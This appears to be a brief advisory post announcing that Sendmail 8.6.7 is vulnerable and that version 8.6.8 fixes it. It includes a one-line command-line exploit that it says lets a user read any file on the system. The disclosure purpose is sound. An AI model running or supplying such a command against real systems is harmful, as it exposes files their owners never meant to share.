Sendmail 8.6.7 is vulnerable, and consequently 8.6.8 has been released. It's available from ftp.cs.berkeley.edu:/ucb/sendmail/sendmail.8.6.8* It's possible to read any file on the system with 8.6.7 from the command line. Simply: /usr/lib/sendmail -oEfilename_to_read bounce From: your_username